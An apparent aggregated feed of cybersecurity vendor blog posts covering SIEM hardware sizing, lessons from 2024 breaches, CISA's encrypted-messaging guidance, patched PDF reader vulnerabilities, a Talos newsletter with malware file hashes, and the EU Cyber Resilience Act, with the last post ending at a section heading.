Hardware for SIEM systems | Kaspersky official blog

At some point, the information security department of any large company inevitably begins to consider introducing a SIEM system — or replacing the existing one, and must therefore estimate the budget required for its deployment. But SIEM isn’t a lightweight product that can be deployed within existing infrastructure. Almost all solutions in this category require additional hardware, meaning that equipment must be purchased or rented.

So, for accurate budgeting, it’s necessary to take into account the expected hardware configuration. In this post, we discuss how SIEM hardware requirements change depending on the company’s profile and system’s architecture, and provide rough parameters to help estimate the preliminary cost of such equipment.

Evaluating the data flow

Essentially, a SIEM system collects event data from internal and external sources and identifies security threats by correlating this data. Therefore, before considering what hardware will be required, it’s essential to first assess the volume of information the system will process and store. To this end, you need to first identify critical risks to the infrastructure, and then determine the data sources that must be analyzed to help detect and address threats related to these risks. These are the data sources to focus on. Such an assessment is necessary not only to determine the required hardware, but also to estimate the cost of licensing. For example, the cost of licensing for our Kaspersky Unified Monitoring and Analysis Platform SIEM system directly depends on the number of events per second (EPS). Another important aspect is to check how the vendor calculates the number of events for licensing. In our case, we take the events per second after filtering and aggregation, calculating the average number of events over the past 24 hours rather than their peak values — but not all vendors follow this approach.

The most common sources include endpoints (Windows events, Sysmon, PowerShell logs, and antivirus logs), network devices (firewalls, IDS/IPS, switches, access points), proxy servers (such as Squid and Cisco WSA), vulnerability scanners, databases, cloud systems (such as AWS CloudTrail or Office 365), and infrastructure management servers (domain controllers, DNS servers, and so on).

As a rule, to form preliminary expectations about the average event flow, the size of the organization can serve as a guide. However, the architectural particularities of specific IT infrastructure can make company size a less decisive parameter.

In general, for small and medium-sized organizations with just one office — or up to several offices with good communication channels among them and IT infrastructure located in a single data center — an average event flow of 5000–10 000 EPS can be expected. For large companies, making an estimate is more challenging: depending on the complexity of the infrastructure and the presence of branches, EPS can range from 50 000 to 200 000 EPS.

Architectural components of an SIEM system

An SIEM system generally consists of four main components: the management subsystem, event collection subsystem, correlation subsystem, and storage subsystem.

Core (management subsystem). You can think of this as the control center of the system. It allows managing the other components, and provides visualization tools for SOC analysts — enabling them to easily configure operational parameters, monitor the SIEM system’s state, and, most importantly, view, analyze, sort and search events, process alerts, and work with incidents. This control center needs to also support log viewing through widgets and dashboards, and enable quick data search and access.

The core is an essential component and can be installed as a single instance or as a cluster to provide a higher level of resilience.

Event collection subsystem. As the name suggests, this subsystem collects data from various sources and converts it into a unified format through parsing and normalization. To calculate the required capacity of this subsystem, one must consider both the event flow intensity and the log format in which events arrive from sources.

The server load depends on how the subsystem processes logs. For example, even for structured logs (Key Value, CSV, JSON, XML), you can use either regular expressions (requiring significantly more powerful hardware) or the vendor’s built-in parsers.

Correlation subsystem. This subsystem analyzes data collected from logs, identifies sequences described in correlation rule logic, and, if necessary, generates alerts, determines their threat levels, and minimizes false positives. It’s important to remember that the correlator’s load is also determined not only by the event flow but by the number of correlation rules and the methods used to describe detection logic as well.

Storage subsystem. An SIEM system must not only analyze but also store data for internal investigations, analytics, visualization and reporting, and in certain industries — for regulatory compliance and retrospective alert analysis. Thus, another critical question at the SIEM system design stage is how long you want to store collected logs. From an analyst’s perspective, the longer the data is stored, the better. However, a longer log retention period increases hardware requirements. A mature SIEM system provides the ability to strike a balance by setting different retention periods for different log types. For example, 30 days for NetFlow logs, 60 days for Windows informational events, 180 days for Windows authentication events, and so on. This allows data to be optimally allocated across available server resources.

It’s also important to understand what volume of data will be stored using hot storage (allowing quick access) and cold storage (suitable for long-term retention). The storage subsystem must offer high performance, scalability, cross-storage search capabilities (both hot and cold), and data viewing options. Additionally, the ability to back up stored data is essential.

Architectural features of Kaspersky SIEM

So, we’ve laid out the ideal requirements for an SIEM system. It probably won’t surprise you that our Kaspersky Unified Monitoring and Analysis Platform meets these requirements. With its built-in capability to scale for data flows reaching hundreds of thousands of EPS within a single instance, our SIEM system isn’t afraid of high loads. Importantly, it doesn’t need to be split into multiple instances with correlation results reconciled afterwards — unlike many alternative systems.

The event collection subsystem of the Kaspersky Unified Monitoring and Analysis Platform system is equipped with a rich set of parsers optimized for processing logs in each format. Additionally, the multi-threading capabilities of Go mean the event flow can be processed using all available server resources.

The data storage subsystem used in our SIEM system consists of servers that store data, and servers with the clickhouse-keeper role, which manage the cluster (these servers don’t store data themselves but facilitate coordination among instances). For data flows of 20 000 EPS with a relatively low number of search queries, these services can operate on the same servers that store the data. For higher data flows, it’s recommended to separate these services. For instance, they can be deployed on virtual machines (a minimum of one is required, though three are recommended).

The Kaspersky Unified Monitoring and Analysis SIEM storage system is flexible — allowing event flows to be distributed across multiple spaces, and specifying the storage depth for each space. For example, inexpensive disks can be used to create cold storage (where searches are still possible, just slower). This cold storage can house data that is unlikely to require analysis but must be stored due to regulatory requirements. Such information can be moved to cold storage literally the day after it’s collected.

Thus, the data storage approach implemented in our SIEM system enables long-term data retention without exceeding the budget on expensive equipment, thanks to hot and cold storage capabilities.

SIEM architecture deployment using our SIEM as an example

The Kaspersky Unified Monitoring and Analysis Platform supports multiple deployment options, so it’s important first to determine your organization’s architecture needs. This can be done based on the estimated EPS flow, and the particularities of your company. For simplicity, let’s assume the required data retention period is 30 days.

Data flow: 5000–10 000 EPS

For a small organization, the SIEM system can be deployed on a single server. For example, our SIEM system supports the All-in-One installation option. In this case, the required server configuration is 16 CPUs, 32GB of RAM, and a 2.5TB of disk space.

Data flow: 30 000 EPS

For larger organizations, separate servers are needed for each SIEM component. Dedicating a server exclusively for storage ensures that search queries don’t affect the processing of events by the collector and correlator. However, the collector and correlator services can still be deployed together (or separately, if desired). An approximate equipment configuration for this scenario is as follows:

  • Core: 10 CPUs, 24GB of RAM, 0.5TB of disk space
  • Collector: 8 CPUs, 16GB of RAM, 0.5TB of disk space
  • Correlator: 8 CPUs, 32GB of RAM, 0.5TB of disk space
  • Storage: 24 CPUs, 64GB of RAM, 14TB of disk space

Data flow: 50 000–200 000 EPS

For large enterprises, additional factors must be considered when defining the architecture. These include ensuring resilience (as the substantial data-flow increases the risk of failure) and the presence of company divisions (branches). In such cases, more servers may be required to install the SIEM system, as it’s preferable to distribute collector and correlator services across different servers for such high EPS flows.

Data flow: 200 000 EPS

As EPS flows grow and the infrastructure divides into separate independent units, the amount of equipment required increases accordingly. Additional servers will be needed for collectors, storage, correlators, and keepers. Moreover, in large organizations, data availability requirements may take precedence. In this case, the Kaspersky Unified Monitoring and Analysis Platform storage cluster divides all collected events into shards. Each shard consists of one or more data replicas. And each shard replica is a cluster node, meaning a separate server. To ensure resilience and performance, we recommend deploying the cluster with two replicas per shard. For processing such large EPS volumes, three collector servers may be required, installed in the offices with the highest event flows.

Kaspersky SIEM in holding companies

In large enterprises, the cost of implementing an SIEM system increases not only with the volume of data, but also depending on the usage profile. For example, in some cases (such as MSP and MSSP environments, as well as large holding companies with multiple subsidiaries or branches), multi-tenancy is required. This means the company needs to maintain multiple “mini-SIEMs”, which operate independently. Our solution enables this through a single installation at the head office, without the need to install separate systems in/at each branch/tenant. This significantly reduces equipment costs.

SIEM scheme

Let’s imagine either (i) a holding company, (ii) a vertically-integrated enterprise, or (iii) a geographically-distributed corporation with either various independent security teams or a need to isolate data access among branches. The Kaspersky Unified Monitoring and Analysis Platform tenant model allows for segregated access to all resources, events, and third-party integration settings. This means one installation functions as multiple separate SIEM systems. In this case, while each tenant can develop its own content (correlation rules), there’s also the option of distributing a unified set of resources across all divisions. In other words, each division can have its own collectors, correlators, and rules, but the HQ security team can also assign standardized bundles of security content for everyone — ensuring consistent protection across the organization.

SIEM in holding

Thus, using the Kaspersky Unified Monitoring and Analysis Platform ensures the necessary performance with relatively modest computing resources. In some cases, savings on hardware can reach up to 50%.

For a more accurate understanding of the required resources and implementation costs, we recommend talking with our specialists or integration partners. We (or our partners) can also provide premium support, assist in developing additional integrations (including using API capabilities for connected products), and oversee the deployment of a turnkey solution covering system design, equipment estimation, configuration optimization, and much more. Learn more about our SIEM system, the Kaspersky Unified Monitoring and Analysis Platform, on the official product page.

Kaspersky official blog – ​Read More

Top 5 Lessons for CISOs and Cybersecurity Professionals from 2024

Cyble | lessons for CISO

The year 2024 has been a rollercoaster for cybersecurity professionals worldwide. From ransomware attacks paralyzing critical industries to insider threats causing massive data breaches, the challenges for Chief Information Security Officers (CISOs) and cybersecurity teams have been relentless. These cyberattacks and data breaches highlight the importance of adapting strategies and learning from past events to secure organizations better as cyber threats evolve. 

Here are the top five lessons for CISO and cybersecurity professionals should learn from as 2025 begins. 

Lessons from 2024 that CISOs Must Carry Forward 

1. Human Error Remains the Biggest Cyber Vulnerability 

A staggering 84% of CISOs in countries like Saudi Arabia, Canada, France, and South Korea identified human error as their organization’s greatest cybersecurity weakness in 2024. This vulnerability extends to phishing attacks, misconfigurations, poor credential management, and insider threats. 

Case in Point: The Star Health Insurance Breach 

In August 2024, India’s largest health insurer, Star Health, suffered a data breach exposing millions of customer medical reports and personal details. The threat actor “xenZen” accused the company’s CISO of insider collusion, sharing a screenshot alleging that credentials were leaked via email. 

This Star Health Insurance data breach highlights two key lessons: 

  • Cybersecurity training needs to go beyond awareness: Employees, especially those handling sensitive data, must undergo regular, scenario-based training. 

  • Strengthen insider threat detection: Advanced monitoring tools and strict access controls can help detect suspicious activities before they escalate into full-blown breaches. 

2. Multi-Factor Authentication (MFA) Is Non-Negotiable 

In 2024, weak or absent MFA emerged as a common denominator in several high-profile breaches. Attackers exploited credential weaknesses to gain access to sensitive systems, causing significant damage. 

Case in Point: The Snowflake Breach 

The U.S.-based cloud storage company Snowflake experienced a breachwhere compromised credentials—obtained through malware—were used to access sensitive customer data. The lack of MFA enforcement on demo accounts allowed hackers to compromise the data of high-profile clients like TicketMaster and LendingTree. 

Lesson Learned: 

  • Implement MFA universally: Every account, internal or external, must have MFA enabled. A single weak link can jeopardize the entire ecosystem. 

  • Enforce credential hygiene: Regularly rotate credentials, monitor for leaked credentials on the dark web, and implement strong password policies. 

3. Ransomware Is Evolving—So Must Your Defenses 

Ransomware attacks continued to dominate headlines in 2024, with 41% of CISOs worldwide naming it a top cybersecurity risk. These attacks increasingly targeted critical infrastructure and essential service providers, making their impact devastating. 

Case in Point: The CDK Global Ransomware Attack 

In June 2024, CDK Global, a software provider for car dealerships, was hit by a ransomware attack that disrupted operations for over 15,000 dealerships. Major companies like Asbury Automotive and Lithia Motors had to revert to manual processes, resulting in financial losses and customer dissatisfaction. 

Lesson Learned: 

  • Strengthen endpoint protection: Implement advanced threat detection tools to identify and stop ransomware before it spreads. 

  • Create vigorous incident response plans: Include regular backups, tabletop exercises, and quick recovery protocols to minimize downtime. 

4. The Supply Chain Is a Critical Weak Link

Cybercriminals increasingly exploited vulnerabilities in supply chains, targeting third-party vendors to gain access to larger organizations. 

Case in Point: The Dell Data Breach 

In 2024, Dell confirmed a data breach exposing 49 million customer purchase records. While financial data remained secure, the stolen information was sufficient to launch phishing and smishing attacks. 

Case in Point: The Ascension Health Cyberattack 

A massive cyberattack on Ascension Health disrupted clinical operations, forcing the nonprofit health system to disconnect from some business partners. The attack led to an additional operating loss of $1.8 billion for the fiscal year. 

Lesson Learned: 

  • Conduct thorough vendor risk assessments: Before partnering with third-party vendors, evaluate their cybersecurity posture. 

  • Mandate compliance with security standards: Require vendors to adopt strong security practices like SOC 2 compliance and regular penetration testing. 

5. Customer Trust Is Harder to Rebuild After a Breach

In 2024, cyberattacks had far-reaching consequences beyond financial losses. According to statistics, 47% of respondents indicated that attracting new customers became significantly harder after a data breach. 

Case in Point: Change Healthcare (CHC) Ransomware Attack 

In February 2024, Change Healthcare fell victim to a ransomware attack linked to the BlackCat group. With sensitive health data of over 110 million individuals exposed, the incident eroded trust among customers. Despite offering credit monitoring services, the reputational damage proved difficult to mitigate. 

Lesson Learned: 

  • Be transparent and proactive: When breaches occur, communicate quickly, outline steps taken to mitigate the impact, and offer affected customers tangible support. 

  • Invest in brand reputation management: Build a strong security narrative and a culture of trust through certifications, audits, and visible cybersecurity initiatives. 

Actionable Takeaways for CISOs and Cybersecurity Professionals 

As the threat landscape becomes increasingly complex, organizations must adopt a multi-faceted approach to cybersecurity. Incorporating advanced tools and platforms can significantly enhance CISO’s ability to address modern threats and safeguard their enterprise. 

Tools like Cyble Vision provide a comprehensive suite of capabilities that can empower organizations to identify, monitor, and mitigate threats across their digital footprint. For example: 

  • Attack Surface Management: Proactively identify and mitigate vulnerabilities by gaining a complete view of your organization’s external attack surface. 

  • Brand Intelligence: Protect against online brand abuse, including phishing and fraudulent domains, to safeguard customer trust and your organization’s reputation. 

  • Dark Web Monitoring: Stay ahead of cybercriminals with continuous monitoring of dark web activities, uncovering leaked credentials, sensitive data, and emerging threats. 

  • Cyber Threat Intelligence: Leverage AI-driven insights and continuous monitoring to detect and counteract evolving cyber threats in real time. 

  • Takedown and Disruption Services: Address malicious campaigns effectively by removing fraudulent websites and disrupting attack operations. 

  • Third-Party Risk Management: Identify and mitigate risks from vendors and external collaborators, ensuring security in your business partnerships. 

  • Vulnerability Management: Use advanced scanning and remediation tools to address vulnerabilities before they are exploited. 

These capabilities, combined with features like digital forensics, incident response, and executive monitoring, enable CISOs to adopt a proactive, intelligence-led approach to managing cybersecurity challenges. Solutions like Cyble’s provide the visibility and tools needed to stay ahead of adversaries, reduce exposure, and protect critical assets. 

By integrating such advanced tools into their cybersecurity frameworks, CISOs can not only address existing risks but also build resilience against future threats, ensuring their organization’s digital security is always one step ahead. 

To Sum Up 

The lessons from 2024’s high-profile cyberattacks highlight the need for a shift from reactive to proactive cybersecurity strategies. With 38% of CISOs identifying malware as a top risk and 29% pointing to email fraud and DDoS attacks, it’s clear that the threat landscape continues to evolve at an alarming pace.  

However, as businesses navigate these challenges, the focus must remain on fortifying human and technological defenses, building cyber resilience, and fostering transparency in post-breach communication. 

As organizations worldwide grapple with the dual pressures of digital transformation and escalating cyber threats, the stakes have never been higher. Learning from the mistakes and successes of 2024 will empower CISOs and cybersecurity professionals to build stronger, more adaptive defenses—ensuring not just survival but success in the face of cyber adversity. 

The post Top 5 Lessons for CISOs and Cybersecurity Professionals from 2024 appeared first on Cyble.

Blog – Cyble – ​Read More

CISA Recommends Encrypted Messaging Apps as Telecom Security Questioned 

Cyble | Telecom networks

The security of U.S. telecom networks has come under fresh scrutiny in recent months, with the latest example coming this week when the Cybersecurity and Infrastructure Security Agency (CISA) recommended that individuals in need of high security use encrypted messaging apps for mobile communications. 

Concern grew in October when CISA and the FBI confirmed that China-linked threat actors had infiltrated telecom networks in an attempt to spy on President-elect Donald Trump and the campaign of Vice President Kamala Harris, among other top U.S. officials. 

Congressional hearings followed, including an extraordinary admission from Senator Mark Warner that “thousands and thousands and thousands” of vulnerable telecom network devices might need to be replaced. 

“Unlike some of the European countries where you might have a single telco, our networks are a hodgepodge of old networks,” Warner told the Washington Post. “The big networks are combinations of a whole series of acquisitions, and you have equipment out there that’s so old it’s unpatchable.” 

Guidance earlier this month from U.S. cyber and national security agencies and counterparts in Canada, Australia and New Zealand offered comprehensive advice for hardening and securing global telecom networks in light of the attacks, and the U.S. Federal Communications Commission (FCC) said it would take steps to mandate stronger telecom security. 

Attention Turns to SS7 and Diameter as List of Attackers Grows 

Recently, the security of the 40-year-old Signaling System No. 7 (SS7) telecom protocols used in 2G and 3G SMS and phone services – as well as international roaming – came under renewed scrutiny over SS7’s potential to allow location tracking, interception of voice data and multi-factor authentication keys, as well as the protocol’s potential as a spyware delivery vector. The 4G and 5G Diameter protocol also has location tracking vulnerabilities, and 4G and 5G users could also find themselves downgraded to SS7 when roaming. 

Senator Ron Wyden earlier this month released 23 pages of correspondence with the U.S. Department of Defense (DoD) detailing insecurities in telecom messaging systems and the SS7 and Diameter protocols. Wyden and Senator Eric Schmitt asked DoD Inspector General Robert Storch to “investigate the Department of Defense’s (DOD) failure to secure its unclassified telephone communications from foreign espionage.” 

“Teams and certain other platforms utilized by DOD are not end-to-end encrypted by default, causing concerning gaps in security that could easily be mitigated,” the Senators wrote. “End-to-end encrypted voice, video, and text messaging tools such as Signal, WhatsApp, and FaceTime better protect communications in the event that the company that offers the service is hacked.” 

DoD has begun limited pilots of a potentially more secure platform known as Matrix that is widely used by NATO allies, but the senators said the Defense Department needs to do more. 

The letter included a number of appendices detailing correspondence between Wyden’s staff and the DoD. 

In one, Wyden’s staff asked the DoD if it agreed with three statements by the Department of Homeland Security on SS7’s and Diameter’s security shortcomings that were included in a 2017 report – and the DoD responded that it agreed with the statements. 

The three DHS statements the DoD agreed with are: 

  • DHS “believes that all U.S. carriers are vulnerable to [SS7 and Diameter] exploits, resulting in risks to national security, the economy, and the Federal Government’s ability to reliably execute national essential functions.” 

  • DHS “believes SS7 and Diameter vulnerabilities can be exploited by criminals, terrorists, and nation-state actors/foreign intelligence organizations.” 

  • DHS “believes many organizations appear to be sharing or selling expertise and services that could be used to spy on Americans.” 

Wyden also said he had seen an unreleased CISA report from 2022 detailing U.S. telecom security issues that contained “alarming details about SS7-related surveillance activities involving U.S. telecommunications networks.” 

Wyden asked if DoD was “aware of any incidents in 2022 or 2023 in which DoD personnel, whether located in the U.S. or outside the U.S, were surveilled through SS7 and Diameter enabled technologies?” 

The DoD replied that the question “Requires a classified response.” 

Wyden sent the DoD a slide from a 2017 DHS event (not included in the documents) that identified the “primary countries reportedly using telecom assets of other nations to exploit U.S. subscribers. Those countries, according to the DHS presentation, are Russia, China, Israel and Iran.” 

Wyden said Russia, China, Israel and Iran had also used telecom assets of countries in Africa, Central and South America, Europe, the Middle East, and Africa to “attack US subscribers … indicating that these foreign governments are using SS7 to target U.S. users, and that these SS7 attack are being routed through 3rd country networks.” 

Asked if it agreed with those assessments, the DoD replied that it “is not in a position to render an assessment without access to the underlying data that informed this presentation.” 

CISA’s Encrypted Messaging Guidance 

With that background, CISA’s guidance issued this week merits particularly close attention by anyone engaged in sensitive communications, especially those who may come under international roaming. 

The CISA document includes specific recommendations for Android and iPhone devices, but general guidance includes: 

  • Using a free messaging application for secure communications that guarantees end-to-end encryption, such as Signal or similar apps. 

  • Enable Fast Identity Online (FIDO) phishing-resistant authentication. 

  • Take inventory of valuable accounts, including email and social media and review any accounts where information leakage would benefit threat actors 

  • Enroll each account in FIDO-based authentication, especially Microsoft, Apple, and Google accounts. Once enrolled in FIDO-based authentication, disable other less secure forms of MFA. 

  • For Gmail users, enroll in Google’s Advanced Protection (APP) program to strengthen defenses against phishing and account hijacking. 

  • Migrate away from Short Message Service (SMS)-based MFA and disable SMS as a second factor for authentication. 

  • Use a password manager to store all passwords. 

  • Set a Telco PIN and MFA for mobile phone accounts to protect against SIM-swapping techniques. 

The post CISA Recommends Encrypted Messaging Apps as Telecom Security Questioned  appeared first on Cyble.

Blog – Cyble – ​Read More

Acrobat out-of-bounds and Foxit use-after-free PDF reader vulnerabilities found

Acrobat out-of-bounds and Foxit use-after-free PDF reader vulnerabilities found

Cisco Talos’ Vulnerability Research team recently disclosed three out-of-bounds read vulnerabilities in Adobe Acrobat Reader, and two use-after-free vulnerabilities in Foxit Reader.  

These vulnerabilities exist in Adobe Acrobat Reader and Foxit Reader, two of the most popular and feature-rich PDF readers on the market. 

The vulnerabilities mentioned in this blog post have been patched by their respective vendors, all in adherence to Cisco’s third-party vulnerability disclosure policy. Adobe’s patched this in version 24.005.20320, and Foxit’s patch appears in PDF Editor version 12.1.9/11.2.12.

For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.  

Out-of-bounds read Adobe Acrobat Reader Vulnerabilities 

Discovered by  KPC.  

Specially crafted font files embedded into a PDF can trigger out-of-bounds memory reads in TALOS-2024-2076 (CVE-2024-49534), TALOS-2024-2070 (CVE-2024-49533), and TALOS-2024-2064 (CVE-2024-49532), which could lead to the disclosure of sensitive information and further exploitation. An attacker must trick the user into opening a malicious file to trigger these vulnerabilities. 

Foxit object use-after-free vulnerabilities 

Discovered by KPC. 

Two use-after-free vulnerabilities exist in the way Foxit Reader handles certain objects. TALOS-2024-2093 (CVE-2024-49576) and TALOS-2024-2094 (CVE-2024-47810) can be triggered by malicious JavaScript code in a PDF file. An attack needs to either trick a user into opening the malicious file, or the user must navigate to a maliciously crafted website while the Foxit browser extension is enabled. This vulnerability can lead to memory corruption and result in arbitrary code execution. 

Cisco Talos Blog – ​Read More

Welcome to the party, pal!

Welcome to the party, pal!

Welcome to the final Threat Source newsletter of 2024. 

Watching “Die Hard” during the Christmas season has become a widely recognized tradition for many, despite ongoing debates about its classification as a Christmas movie. I know it isn’t everyone’s cup of tea. Whether you like the movie or not, let me share a story about what didn’t quite go as planned in my family last year.  

When  some celebrities had their social media accounts compromised, I saw it as the perfect opportunity to introduce my family to the world of multi-factor authentication (MFA) for their online accounts. Our home IT setup is diverse— With Linux, Macs, Windows; Androids, iOS, we needed something cross-platform. Also, we needed a user-friendly solution as we have both standard users and IT experts (never underestimate your users). From my professional standpoint, I decided to go “all in” with hardware tokens – they work cross platform and “survive” one or the other OS installs from scratch. Providing two for each person was mandatory in case one got lost, which had happened to me already. So it wasn’t a cheap exercise. In my defense, this was before the side-channel attack EUCLEAK was discovered, which has since expanded to affect more products as noted in the first release. 

In the spirit of John McClane : “Now I know what a TV dinner feels like.” 

The kids found the gift “boring” and almost a year later, the adoption rate is still only 30%. Fortunately, my wife had the foresight to prepare real presents for the family, saving Christmas Eve from being a “bad guys win” scenario. (Only John Thor can drive somebody that crazy.) 

I share this anecdote not to discourage you, but to help you avoid making the same mistake and risking your celebrations. Unless everyone gathered around the Christmas tree is an infosec professional, it might not be the time to go “Yippee-ki-yay Mr Falcon” with tech gifts.  

However, spending time with loved ones is a great opportunity to discuss the trends and importance of cybersecurity. We’ve been highlighting compromised credentials for a long time, as seen in our previous posts [here], [here], [here] and [here]. For the fourth consecutive time in over a year, the most observed means of gaining initial access was the use of valid accounts, making it clear identity-based attacks are becoming more prevalent, and wont be gone anytime soon. 

 Advocate for the use of a password managers—there are paid versions with family plans on one end, and excellent open-source alternatives on the other. Avoid storing credentials in browsers, as they can be extracted by info-stealers. Consider using passkeys where possible. According to the fido alliance, more than 20% of the world’s top 100 websites support passkeys already. If passkeys are not yet enabled for one of your services? Any MFA is better than none. Even using “just” TOTP in a software container is a significant improvement over just a password. 

But it’s not just about enabling MFA. As Martin wrote last week, we need to close the gap by communicating and understanding the the threat landscape. When it comes to stolen credentials, share resources like https://haveibeenpwned.com/ or https://sec.hpi.de/ilc/?lang=en with your loved ones so they can check if their email has been part of a breach.   

If you decide not to bother your friends & famliy (though I strongly believe Mbappe, Sweeny and Odenkirk would have preferred a more secure account) with Account/Password Hygiene, there are some more work related recommendations in Hazel’s “How are attackers trying to bypass MFA” 

Whichever is your idea of Christmas, then, like Argyle said, “I gotta be here for New Year’s!”  

We look forward to seeing you in 2025!   

The one big thing

At the time of writing, our Vulnerability Research Team Disclosed 207 Vulnerabilities, and had another 93 reported to the respective Vendor in 2024.  Di you know  Talos has a team which investigates software and operating system vulnerabilities in order to discover them before malicious threat actors do? Every day, they try to find vulnerabilities that have not yet been discovered, and then work to provide a fix for those before a zero-day threat could ever be executed. 

Why do I care? 

We see threat actors exploiting known vulnerabilities constantly. Sometimes those CVEs are Years old.  

So now what? 

Maybe you want to check for some CVEs or conduct a network security assessments. 
You can our team’s reports,roundups,spotlights and deep dives on our blog. 

Top security headlines of the week 

 Blackhat Europe 2024 took place Dec 9-12 in London, UK. Loaded with a lot of interesting Sessions, my favorites are “Vulnerabilities in the eSIM download protocol” and “Over the Air: Compromise of Modern Volkswagen Group Vehicles” both showing how far an attack surface can possibly extend.  

Germany’s Federal Office for Information Security (BSI) says it blocked communication between appr. 30.000 Android IoT Devices which were sold with BadBox malware preinstalled, and their command and control (C2) infrastructure by sinkholing DNS queries (Bleeping Computer)  

Law enforcement agencies worldwide disrupted a holiday tradition for cybercriminals: launching Distributed Denial-of-Service (DDoS) attacks. Booter and stresser websites were taken down, administrators were arrested and over 300 users were identified for planned operational activities. (Europool

The Willow chip is not capable of breaking modern cryptography,” Google’s director of quantum tells The Verge.

Can’t get enough Talos? 

Upcoming events where you can find Talos 

  Cisco Live EMEA (February 9-14, 2025) 

Amsterdam, Netherlands 

Most prevalent malware files from Talos telemetry over the past week  

SHA256:873ee789a177e59e7f82d3030896b1efdebe468c2dfa02e41ef94978aadf006f 
MD5: d86808f6e519b5ce79b83b99dfb9294d  
VirusTotal:
https://www.virustotal.com/gui/file/873ee789a177e59e7f82d3030896b1efdebe468c2dfa02e41ef94978aadf006f 
Typical Filename: n/a 
Claimed Product: n/a  
Detection Name: Win32.Trojan-Stealer.Petef.FPSKK8  

SHA256:9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507 
MD5: 2915b3f8b703eb744fc54c81f4a9c67f  
VirusTotal:
https://www.virustotal.com/gui/file/9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507  
Typical Filename: VID001.exe  
Claimed Product: n/a  
Detection Name: Win.Worm.Bitmin-9847045-0 

 SHA 256:
7b3ec2365a64d9a9b2452c22e82e6d6ce2bb6dbc06c6720951c9570a5cd46fe5  
MD5: ff1b6bb151cf9f671c929a4cbdb64d86  
VirusTotal: https://www.virustotal.com/gui/file/7b3ec2365a64d9a9b2452c22e82e6d6ce2bb6dbc06c6720951c9570a5cd46fe5 
Typical Filename: endpoint.query  
Claimed Product: Endpoint-Collector  
Detection Name: W32.File.MalParent  

 SHA256:47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca 
MD5: 71fea034b422e4a17ebb06022532fdde 
VirusTotal: https://www.virustotal.com/gui/file/47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca 
Typical Filename: VID001.exe 
Claimed Product: n/a  
Detection Name: Coinminer:MBT.26mw.in14.Talos 

 SHA 256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91  
MD5:
7bdbd180c081fa63ca94f9c22c457376  
VirusTotal: https://www.virustotal.com/gui/file/a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91 
Typical Filename: IMG001.exe  
Claimed Product: N/A   
Detection Name: Trojan/Win32.CoinMiner.R174018 

 

 

 

 

Cisco Talos Blog – ​Read More

Europe’s Cyber Resilience Act: A New Era of Cybersecurity for Digital Products 

Cyble | Cyber Resilience Act

Europe embarks on a new chapter in cybersecurity with the entry into force of the Cyber Resilience Act (CRA). This marks the first-ever EU legislation addressing cybersecurity across a broad range of digital products. The CRA will have far-reaching implications for everything from simple connected devices like baby monitors and smartwatches to more complex systems supporting critical infrastructure.  

With mandatory cybersecurity requirements imposed on manufacturers and retailers, the Act promises to make Europe’s digital space safer, fostering resilience against cyber threats. The Cyber Resilience Act introduces harmonized rules for products containing digital elements, aiming to ensure high levels of cybersecurity standards throughout their entire lifecycle. 

This means manufacturers and retailers must meet strict cybersecurity standards at every stage of the product’s journey—from design and production to maintenance and eventual disposal. The goal is to enhance transparency, reduce vulnerabilities, and strengthen overall security for products connected to or interacting with other networks and devices. 

The CRA’s requirements apply to all products with digital components, with a few exclusions such as medical devices and aviation equipment. By December 2027, any product sold in the EU containing digital elements will need to meet these cybersecurity standards and bear the CE marking, signifying compliance. The CE marking is a symbol that indicates a product meets EU safety and regulatory standards, and for the first time, it will also assure consumers that the product adheres to stringent cybersecurity measures. 

The Cyber Resilience Act (CRA) Will Impact All Economic Operators 

The CRA targets all economic operators placing products with digital components on the European market, meaning it applies to manufacturers, importers, and retailers. Some of the key factors of the act are:  

  • Additional Guidance for SMEs: Microenterprises and small businesses (SMEs) will receive extra guidance to help them comply with the Cyber Resilience Act (CRA) requirements. 

  • Flexibility for Member States: While the CRA sets minimum cybersecurity standards, Member States have the flexibility to enforce stricter regulations where necessary. 

  • Third-Party Assessments for High-Risk Products: Certain high-risk products, such as firewalls, intrusion detection systems, and cybersecurity tools, will undergo mandatory third-party assessments to ensure compliance with security standards, especially if they are critical to infrastructure or essential services. 

  • Open-Source Software Exemption: Open-source software is not subject to the same strict CRA requirements as commercial products. It is only regulated under the CRA when supplied for commercial use. 

  • Exemption for Non-Commercial Open-Source Software: Software developed by nonprofits or small businesses for non-commercial use is exempt from CRA requirements. 

  • Requirements for Commercial Open-Source Software: Open-source software developed for commercial purposes must adhere to cybersecurity best practices under the CRA. However, it is not required to have a CE marking. 

  • Cybersecurity Standards for Open-Source in Commercial Products: Manufacturers incorporating open-source software into their products must ensure these components meet cybersecurity standards, including regular updates and vulnerability management. 

Strengthening Cybersecurity for Critical Infrastructure 

The Cyber Resilience Act plays a crucial role in protecting Europe’s critical infrastructure. Digital products used by these services must meet established cybersecurity standards to avoid potential disruption from cyberattacks.  

  • Security of Critical Infrastructure: The CRA ensures that products integrated into critical infrastructure, such as power grids and transportation systems, are secure by default. 

  • Complementing Existing Regulations: The CRA complements existing regulations like the EU Cybersecurity Strategy and the NIS2 Directive, creating a unified framework for resilience across various sectors. 

  • Sector-Specific Requirements: Some sectors have additional or specific requirements, with existing EU rules on medical devices and vehicles remaining unaffected by the CRA. 

  • Consistency in Radio Equipment Regulations: The cybersecurity of radio equipment will continue to be governed by pre-existing regulations, ensuring consistency within the EU’s legislative framework. 

  • Focus on Security Updates and Vulnerability Management: Manufacturers must provide security updates for their products throughout their lifespan, addressing vulnerabilities as they arise. 

  • Support Periods for Products: The CRA mandates at least five years of security updates for most products, with longer support periods required for products with longer lifespans, such as industrial systems or hardware. 

  • Vulnerability Reporting and Fixes: If a vulnerability is discovered, manufacturers must promptly inform users and fix the issue. 

  • Incident Reporting Requirements: If a product’s security is compromised, manufacturers must notify relevant authorities and affected users, including mandatory reporting to cybersecurity agencies like ENISA. 

Ensuring Transparency and Market Compliance 

